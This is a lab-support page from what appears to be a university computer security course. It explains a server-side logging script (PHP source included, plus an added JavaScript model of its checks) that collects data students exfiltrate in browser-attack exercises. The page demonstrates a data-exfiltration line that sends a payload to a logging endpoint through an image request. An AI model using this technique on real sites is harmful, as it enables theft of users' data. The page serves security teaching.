You can use this server-side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:
(new Image()).src='https://css.csail.mit.edu/6.566/2024/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();
The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.
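How the server treats these arguments, modelled in JavaScript from the PHP source reproduced at the end of this page. This is an added example, not the course's code: the function name, the in-memory map standing in for APCu and the injected clock are assumptions, and the RFC 2822 timestamp that the real script prepends to each line is left out.

```javascript
// Added example: a model of the checks log.php applies before it logs a request.
// handleLogRequest, recent and nowSeconds are illustrative names, not the course's.
const MAX_LEN = 1000;       // log.php rejects an id or payload longer than 1000 bytes
const DEDUPE_SECONDS = 5;   // TTL in apcu_add($payload, true, 5)
const recent = new Map();   // payload -> expiry time (stand-in for the APCu cache)

// PHP strlen() counts bytes, not characters, so measure the UTF-8 encoding.
const byteLength = (s) => new TextEncoder().encode(s).length;

// CR and LF become '.', so one request can only ever produce one log line.
const neutralize = (s) => s.replace(/[\r\n]/g, '.');

// Returns { status, line }: the HTTP status log.php would send and the
// "id: payload" part of the log line, or null when nothing is logged.
function handleLogRequest(params, nowSeconds) {
  if (!('id' in params)) return { status: 200, line: null }; // plain page view
  const id = params.id;
  if (byteLength(id) > MAX_LEN) return { status: 413, line: null };
  if (!('payload' in params)) return { status: 400, line: null };
  const payload = params.payload;
  // PHP empty() is true for "" and also for the string "0".
  if (payload === '' || payload === '0') return { status: 400, line: null };
  if (byteLength(payload) > MAX_LEN) return { status: 413, line: null };
  // The duplicate check is keyed on the raw payload alone: id and random are
  // not part of the key, so random defeats the browser cache but not this check.
  const expiry = recent.get(payload);
  if (expiry !== undefined && expiry > nowSeconds) return { status: 429, line: null };
  recent.set(payload, nowSeconds + DEDUPE_SECONDS);
  return { status: 200, line: `${neutralize(id)}: ${neutralize(payload)}` };
}
```

The newline replacement covers the log file only; on display, the page passes the whole file through `htmlspecialchars`, so logged markup is shown as text rather than interpreted.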
If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)
Below are the most recent logged entries, so that you can check if your attack worked:
In case you are curious, here is the source code of this page.
<?php
header("Access-Control-Allow-Origin: *");

do {
    if (!array_key_exists("id", $_REQUEST)) {
        break;
    }
    $id = $_REQUEST['id'];
    if (strlen($id) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "ID value is larger than 1000 bytes";
        return;
    }
    if (!array_key_exists("payload", $_REQUEST)) {
        header("HTTP/1.0 400 Bad Request");
        echo "No payload given";
        return;
    }
    $payload = $_REQUEST['payload'];
    if (empty($payload)) {
        header("HTTP/1.0 400 Bad Request");
        echo "Empty payload given";
        return;
    }
    if (strlen($payload) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "Payload is larger than 1000 bytes";
        return;
    }
    if (!function_exists('apcu_add')) {
        header("HTTP/1.0 501 Not Implemented");
        echo "APCu not enabled, so no rate limiting; refusing all requests";
        return;
    }
    if (apcu_add($payload, true, 5) === false) {
        // exact same $payload was sent in the past 5 seconds
        header("HTTP/1.0 429 Too Many Requests");
        echo "That exact payload was sent very recently; rejecting";
        return;
    }
    $payload = str_replace(array("\n", "\r"), '.', $payload);
    $id = str_replace(array("\n", "\r"), '.', $id);

    $file = fopen("/tmp/6.566-2024-logger.txt", "c+");
    if ($file === false) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to open log file";
        return;
    }
    if (!flock($file, LOCK_EX)) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to lock log file";
        return;
    }
    $lines = array();
    while (!feof($file) && count($lines) < 100) {
        $lines[] = fgets($file);
    }
    ftruncate($file, 0);
    rewind($file);
    fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n");
    foreach ($lines as &$line) {
        fwrite($file, $line);
    }
    flock($file, LOCK_UN);
    fclose($file);
    echo "Logged!";
    return;
} while(0);

$link = "(new Image()).src="
    . "'https://css.csail.mit.edu/6.566/2024/labs/log.php?'"
    . " + 'id=my-username'"
    . " + '&payload=some-string' + '&random='"
    . " + Math.random()";
?><!DOCTYPE html>
<html>
<head>
  <link rel="stylesheet" type="text/css" href="labs.css" />
  <title>Lab 4 Logging Script</title>
</head>
<body>
<h1>Lab 4 Logging Script</h1>
<p>
  You can use this server side script to extract data from client-side
  JavaScript. For example, clicking this client-side hyperlink will cause
  the server to log the payload:
</p>
<pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre>
<p>
  The random argument is ignored, but ensures that the browser bypasses its
  cache when downloading the image. We suggest that you use the random
  argument in your scripts as well. The ID argument will help you distinguish
  your log entries from those sent by other students; we suggest picking your
  MIT Athena username. Newlines are not allowed in <tt>javascript:</tt> links;
  if this bothers you, try
  <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>.
</p>

<h2>Test form</h2>
<p>
  If you just want to try out the script, you can use this form. (For your
  actual attacks in lab 4, you'll probably want to use the JavaScript image
  technique shown above.)
</p>
<form method="GET" action="">
  <label for="id">ID:</label><br />
  <input name="id" placeholder="your-mit-username" size="40" />
  <i>(some identifier to locate your payload in the log)</i>
  <br />
  <br />
  <label for="payload">Payload:</label><br />
  <input name="payload" placeholder="some-string" size="40" />
  <i>(the information you stole)</i>
  <br />
  <input type="submit" value="Log" name="log_submit" />
</form>

<h2>Logged entries</h2>
<p>
  Below are the most recent logged entries, so that you can check if your
  attack worked:
</p>
<pre class="tty"><?php
    $lines = file_get_contents("/tmp/6.566-2024-logger.txt");
    echo htmlspecialchars($lines);
?></pre>

<h2>Source code</h2>
<p>In case you are curious, here is the source code of this page.</p>
<pre><?php highlight_file(__FILE__); ?></pre>
</body>
</html>